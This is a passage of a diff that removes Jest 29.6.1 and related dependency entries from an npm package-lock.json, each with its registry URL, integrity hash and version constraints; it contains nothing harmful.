"jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.set": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/lodash.set/-/lodash.set-4.3.2.tgz", - "integrity": "sha512-4hNPN5jlm/N/HLMCO43v8BXKq9Z7QdAGc/VGrRD61w8gN9g/6jF9A4L1pbUgBLCffi0w9VsXfTOij5x8iTyFvg==" - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - 